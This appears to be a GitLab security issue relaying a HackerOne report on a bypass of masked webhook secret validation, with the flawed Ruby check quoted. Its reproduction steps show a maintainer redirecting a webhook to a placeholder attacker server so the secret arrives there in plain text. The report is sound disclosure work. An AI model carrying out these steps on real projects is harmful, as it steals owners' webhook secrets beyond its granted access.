Maintainer can leak masked webhook secrets by adding a new parameter to the webhook URL to bypass the newly added validation logic

⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1871136 by 0xn3va on 2023-02-12, assigned to @rshambhuni:

Report | Attachments | How To Reproduce

Report

Summary

There is a vulnerability #385118 (closed) that was fixed and disclosed recently. The fix adds an extra check in case the URL changes:

###  https://gitlab.com/gitlab-org/gitlab/-/commit/7f34991ae36f1804610ba9980e31191394c8b208

###  ...

  before_validation :reset_url_variables, unless: ->(hook) { hook.is_a?(ServiceHook) }  
 
###  ...

  def reset_url_variables  
    self.url_variables = {} if url_changed? && !encrypted_url_variables_changed?  
  end

However, reset_url_variables will return false if the URL variables have also been changed. This allows bypassing the check by adding a new variable to the modified URL.

Steps to reproduce

As a project owner

1. Create a project
2. Add another user to the project as a maintainer
3. Go to Settings > Webhooks
4. Put the URL https://example.com?token=secret-token
5. Click to add a mask
6. Add the value secret-token with the replacement TOKEN
7. Click save for the webhook

As a maintaner

1. Open the project
2. Go to Settings > Webhooks
3. Click edit on the webhook
4. Edit the URL to your controlled server like that: https://<ATTACKER_SERVER>?token={TOKEN}&a=aaaaa
5. Add the value aaaaa with the replacement A
6. Save the webhook
7. Now click Test to send a request
8. Check your server logs; it will contain the secret in plain text

Impact

This vulnerability allows an attacker with the Maintainer role to leak webhook secrets.

What is the current bug behavior?

Adding or deleting a new secret does not reset the previously saved ones

What is the expected correct behavior?

Adding or deleting a new secret resets the previously saved ones

Relevant logs and/or screenshots

Screen_Recording_2023-02-12_at_12.55.50.mov

Output of checks

This bug happens on GitLab.com

Impact

This vulnerability allows an attacker with the Maintainer role to leak webhook secrets.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• Screen_Recording_2023-02-12_at_12.55.50.mov

How To Reproduce

Please add reproducibility information to this section: